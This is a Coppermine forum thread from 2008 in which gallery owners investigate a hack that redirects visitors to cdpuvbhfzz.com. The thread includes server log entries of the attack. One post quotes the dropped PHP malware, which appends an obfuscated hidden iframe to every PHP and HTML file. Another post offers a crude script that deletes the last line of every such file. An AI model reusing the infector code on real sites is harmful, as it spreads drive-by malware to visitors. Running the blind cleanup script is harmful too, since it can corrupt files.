Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 2 Someone has Redirected my Site to cdpuvbhfzz.com-What do I do? - Page 2
 

News:

CPG Release 1.6.26
Correct PHP8.2 issues with user and language managers.
Additional fixes for PHP 8.2
Correct PHP8 error with SMF 2.0 bridge.
Correct IPTC supplimental category parsing.
Download and info HERE

Main Menu

Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?

Started by htgguy, April 06, 2008, 10:04:11 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Nibbler

Why do you people have webservers configured to run zip files using PHP? Are you running images as PHP too?

tfischer

I don't want to fall victim to FUD, but I also don't want to be hacked.  I also don't want to bring my gallery down quite yet...  As a precaution I have removed the files update.php and pluginmgr.php from my gallery.  I'm not sure if this will prevent a hack, but since these two files keep coming up, I thought it might be a precaution worth taking, especially since these files aren't needed for normal gallery browsing.

-Tim

mr.goose

@ Nibbler. We don't. (Just double checked.)  :)

Best wishes, G

tfischer


mr.goose

OKAY the relevant part of my apache2.log file. Seems we were actually attacked three times. The first two were unsuccessful.

Attack #1 Note the entries for 83.237.241.116 and note the the error 404 at the end. Attack failed presumably because on our server /coppermine/plugins/ is not writeable by the web server..

Quote83.237.241.116 - - [06/Apr/2008:16:23:44 +0100] "GET /coppermine/update.php HTTP/1.1" 200 29995 "-" "Mozilla/8.0"
61.247.217.35 - - [06/Apr/2008:16:24:31 +0100] "GET /coppermine/thumbnails.php?album=search&lang=french&search=2003-11-14 HTTP/1.1" 200 67845 "-" "Yeti/1.0 (+http://help.naver.com/robots/)"
83.237.241.116 - - [06/Apr/2008:16:24:32 +0100] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 200 22782 "-" "Mozilla/8.0"
83.237.241.116 - - [06/Apr/2008:16:24:34 +0100] "GET /coppermine/plugins/docs.php HTTP/1.1" 404 2536 "-" "Mozilla/8.0"

Attack #2 Again note the the entries for 83.237.241.116:-

Quote83.237.241.116 - - [06/Apr/2008:16:27:49 +0100] "GET /coppermine/update.php HTTP/1.1" 200 29995 "-" "Mozilla/8.0"
74.6.25.239 - - [06/Apr/2008:16:28:41 +0100] "GET /coppermine/login.php?referer=displayimage.php%3Falbum%3Dtoprated%26cat%3D0%26pos%3D48 HTTP/1.1" 200 23577 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
83.237.241.116 - - [06/Apr/2008:16:28:43 +0100] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 200 22782 "-" "Mozilla/8.0"
194.164.232.81 - - [06/Apr/2008:16:28:44 +0100] "GET /coppermine/albums/archive/project/screengrab/20080406_Firefox_UK_English_Search.png HTTP/1.1" 304 - "http://www.purestorm.com/forum/readThread.aspx?id=41269&start=2" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13"
83.237.241.116 - - [06/Apr/2008:16:28:45 +0100] "GET /coppermine/plugins/docs.php HTTP/1.1" 404 2536 "-" "Mozilla/8.0"orwegian HTTP/1.1" 200 57537 "-" "Yeti/1.0 (+http://help.naver.com/robots/)"

Attack #3 This time its successful. Note the entries for 91.76.23.21 Other IP's are irrelevant. The time of the last entry corresponds exactly with the time stamp on the zip file mentioned in my previous post:-

Quote91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:16 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22625 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
74.6.29.54 - - [08/Apr/2008:18:04:15 +0100] "GET /coppermine/displayimage.php?pos=-7004&lang=turkish HTTP/1.1" 200 32144 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
91.76.23.21 - - [08/Apr/2008:18:04:18 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 68582 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
61.247.217.42 - - [08/Apr/2008:18:04:22 +0100] "GET /coppermine/thumbnails.php?album=247&lang=persian HTTP/1.1" 200 59160 "-" "Yeti/1.0 (+http://help.naver.com/robots/)"
81.202.91.57 - - [08/Apr/2008:18:04:27 +0100] "GET /new_mill/spring98/jpegs/newton.jpg HTTP/1.1" 304 - "http://www.taringa.net/posts/imagenes/948191/Algunas-fotos-de-Helmut-Newton.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; uE v7; uE v7)"
91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:23 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22515 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:28 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22414 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

I hope this might shed some light on the matter. Best wishes, G.

sharpo

Just had a look on mine & the ip address matches one of yours

83.237.241.116 - - [06/Apr/2008:17:47:18 +0200] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 302 19518
Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

mr.goose

Quote from: sharpo on April 09, 2008, 12:57:51 AM
Just had a look on mine & the ip address matches one of yours

83.237.241.116 - - [06/Apr/2008:17:47:18 +0200] "POST /coppermine/pluginmgr.php?op=upload HTTP/1.1" 302 19518

Hmm, interesting Sharpo.

I think we may be looking at two slightly types of attack. Whilst they both seem to start with update.php, it seems that the one from 83.237.241.116 (the one that failed in my case) affects pluginmgr.php.  Then there is another from 91.76.23.21 that exploits upload.php instead

I also observed that the French guy on the other forum was also hit from IP 91.76.23.21, which also attacked his upload.php.
http://forum.coppermine-gallery.net/index.php/topic,51692.0.html

Hope this helps someone. best wishes, G.



mr.goose

Oops typo. I meant two slightly different types of attack. Sorry

Best wishes, G.

Joachim Müller

Most replies on this thread (except the report by mr.goose) are invalid. Please don't PM me. Instead, read up what I suggested in this thread and post your report. Everyone who has been running an older version than cpg1.4.16 when he/she got infected should try to fix this on his own and not reply here. Keep this thread clean with only valid postings.

shiftsrl

I've the latest CPG version but yesterday one of users told me about some gallery visualization problems. I've checked the configuration and I've found in the Path to custom header include, a link to /mygallery/albums/userpics/142739_298w3.zip. I've downloaded this file that is really a .php file, not a.zip one, and this is the start of the content

<?php 
function fileExtension($file) {
    
$fileExp explode('.'$file);
    
$filetype $fileExp[count($fileExp)-1];

return $filetype;
}

function 
parse($path) {
$dir_array = array();
if ($handle opendir($path)) {
while (false !== ($file readdir($handle))) { 
if ($file != "." && $file != "..") { 
$try_dir $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array$try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
//chmod($path.$file,0777);
$fhandle fopen($path.$file'a+');
if($f_ext=="php") {
fwrite($fhandle"<?php echo '<iframe src=\"&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#100;&#38;#112;&#38;#117;&#38;#118;&#38;#98;&#38;#104;&#38;#102;&#38;#122;&#38;#122;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#57;&#38;#56;&#38;#46;&#38;#112;&#38;#104;&#38;#112;\" width=1 height=1></iframe>'; ?>
");
}
else {
fwrite($fhandle, "<iframe src=\"&#104;&#116;&#116;&#112;&#58;&#47;&#47;&#99;&#100;&#112;&#117;&#118;&#98;&#104;&#102;&#122;&#122;&#46;&#99;&#111;&#109;&#47;&#100;&#108;&#47;&#97;&#100;&#118;&#53;&#57;&#56;&#46;&#112;&#104;&#112;\" width=1 height=1></iframe>");
}
fclose($fhandle);
}
}
}
}
}
closedir($handle);
}

return $dir_array;
}


I don't know what this code do and where, how and when was put here. I've always made all the upgrade as indicated.

Any suggestion?
Shift Srl
*Link Removed*

j_taubman

I probably get in trouble for posting this,  but I thought I might be able to help someone, I was running 1.4.13,  so I am not asking for help, just to help others in my situation.

If you get the damage to your files, what I did was the the script posted earlier and modified it to remove the last line of any affected files.    Please note it worked for me, but I have no idea if it will cause any additional problems.

killorcure.php

<?php 
function fileExtension($file) {
    
$fileExp explode('.'$file);
    
$filetype $fileExp[count($fileExp)-1];

return $filetype;
}

function 
parse($path) {
$dir_array = array();
if ($handle opendir($path)) {
while (false !== ($file readdir($handle))) { 
if ($file != "." && $file != "..") { 
$try_dir $path.$file.'/';
if(is_dir($try_dir)) {
array_push($dir_array$try_dir);
}
else {
if ($path[strlen($path)-1] != '/') {
$path.= '/';
}
$f_ext fileExtension($file);
if($f_ext=="php" || $f_ext=="html" || $f_ext=="htm") {
if($file!="debugger.inc.php") {
cutline($path.$file);
}
}
}

}
closedir($handle);
}

return $dir_array;
}

function 
launch() {
$total 0;
$last 1;
$last_num 0;
$path $_SERVER['DOCUMENT_ROOT'];
$dirs = array();
array_push($dirs$path);

while($last) {
$last_num 0;
for( $j=$total$j<$total+$last$j++) {
$temp_dirs parse($dirs[$j]);
$last_t sizeof($temp_dirs);
$last_num += $last_t;
for( $i=0$i<$last_t$i++) {
array_push($dirs$temp_dirs[$i]);
}
}
$total += $last;
$last $last_num;
}
}
function 
cutline($filename,$line_no=-1) {

$strip_return=FALSE;

$data=file($filename);
$pipe=fopen($filename,'w');
$size=count($data);

if(
$line_no==-1$skip=$size-1;
else 
$skip=$line_no-1;

for(
$line=0;$line<$size;$line++)
if(
$line!=$skip)
fputs($pipe,$data[$line]);
else
$strip_return=TRUE;

return 
$strip_return;

echo 
"~!";
launch();
?>




DO NOT run it more than once as it does not mind what is on the line it deletes

mr.goose

I have been trying to figure this out all night. As Joachim rightly said earlier, if one is running more than one php application on a hacked server then it is difficult to say which PHP application is causing the problem. For example we run Joomla and PHPBB3 as well as a number of smaller applications, any one of which could be to blame (though they are all latest versions). So I've been looking at the scripts involved with this hack for clues with regard to the application it tries to exploit. I think the 142739_298w3.zip script may have a clue. Now, the interesting line is the one that makes reference to debugger.inc.php.

Quote...
if($file!="debugger.inc.php") {
                     //chmod($path.$file,0777);

I just performed a search on my entire server. Seems the only PHP application on my server that has a file called debugger.inc.php is Coppermine. So I Googled it. Seems of the major PHP web applications, Coppermine is indeed the only one I can find that uses a file called debugger.inc.php. This does not prove the hack is Coppermine's fault but it does perhaps suggest that the hackers may have singled out Coppermine for special attention? Anyone got any thoughts?

Best wishes, G.

Hein Traag

I did a likewise Search and although it does seem to infect all php files on a server it attacks it does seem to gain entrance through debugger.inc.php. Or so it seems if you want to believe all the other reports on the net that are being written.

But like you said this does NOT prove the blame lies with coppermine as a lot of the reports i read do not mention cpg being used together with the site which was infected.

mr.goose

Thing is Hein, in order for the 142739_298w3.zip file to be placed on the compromised machine, the hack to gain entry would already have taken place - if you see what I mean?

In our case, the Apache logs indicate that at exactly the time the various files on my system were altered, a known hacking machine with an IP 91.76.23.21 was communicating with certain key Coppermine files on my server(extraneous and irrelevant log entries removed for clarity):-

Quote91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:16 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22625 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:18 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 68582 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:03:12 +0100] "GET /coppermine/update.php HTTP/1.1" 200 30007 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:23 +0100] "POST /coppermine/upload.php HTTP/1.1" 200 22515 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
91.76.23.21 - - [08/Apr/2008:18:04:28 +0100] "POST /coppermine/admin.php HTTP/1.1" 200 22414 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"

Another interesting fact in our case is that I limit the files that the webserver can write to on a "need to write" basis. This means that only those files to which the web server had write access were modified. It means my cleanup will be reasonably straightforward. Also means that the files update.php, upload.php & admin.php are all unaltered and exactly the same as the originals. Yet the log evidence suggests that it was these files that the hackers exploited in order to get access to my server in order to place the 142739_298w3.zip file on the server in the first place.

Again this is not concrete proof but it may be another clue? What are your thoughts?

Meantime, I'll keep digging and report back if I come up with anything that might be helpful to you guys.


Best wishes, G.

Nibbler

Question for the affected: Do you all have URI uploads enabled?

mr.goose

Quote from: Nibbler on April 09, 2008, 03:48:16 PM
Question for the affected: Do you all have URI uploads enabled?

Within Coppermine? Yes I do. Why do you ask?

Best wishes, G

sharpo

Sharpo (not an expert, just a Coppermine user)
3 live galleries, first started in 2006.
http://www.sharpos-world.co.uk/BB3cpg/ with over 8,000 images.
http://www.sharpos-world.co.uk/cpg/ with over 25,000 images. 1.6.25
http://www.sharpos-world.co.uk/kc/ with over 300 images. 1.6.25

Nibbler

Thanks. I've found a vulnerability there. Fix should be available soon, but for now you should disable that feature.

mr.goose

Quote from: Nibbler on April 09, 2008, 04:34:24 PM
Thanks. I've found a vulnerability there. Fix should be available soon, but for now you should disable that feature.

Well done Nibbler! You guys are pretty quick. :)

OKAY. I said I'd post with more research when I had done it. I wasn't sure whether to post this research here or start a new thread. Apologies if I have done wrong. Thing is, I've been trying to figure out what the hacker was hoping to achieve with this hack The clue is what is contained within the iFrame and the site it links to. Basically, the linked site contains a php file (WARNING this file may be dangerous):-

When you "view source", you'll find some heavily obfuscated javascript (attached as text file). This code could, in theory, enable the hacker to:-

  • Make any popups he wants appear on your site and
  • Invisibly connect your site visitors to viruses and trojans etc.

By the way, there is quite a good article at SANS Internet Storm Center about exploits that use obfuscated Javascript hosted on a remote site:-

Anyway, I've not managed to crack the script obfuscation yet and I don't think the current script works very well anyway. But I just stumbled across a similarly hacked Coppermine site that has just been blacklisted by google because of malware. I thought the Coppermine Dev Team might want to take a look at some point because this may be the shape of things to come. WARNING to everyone else: these hacked sites may be dangerous!

Seems this hack is potentially very nasty indeed and I suspect that many site owners are unaware they have been hacked at all. So any information the Coppermine Dev Team feels able to share with us regarding this hack would be very gratefully received please.
Best wishes, and thanks again for dealing with it so quickly. G.

Tano*87

OMG guys I get the same thing right yesterday. I've deleted the script code from all the PHP pages (which means that I've edited a very lot of page between coppermine and cutenews and I still haven't retoutchd the one from the forum yet) but it comes again today!!!! What I have to do?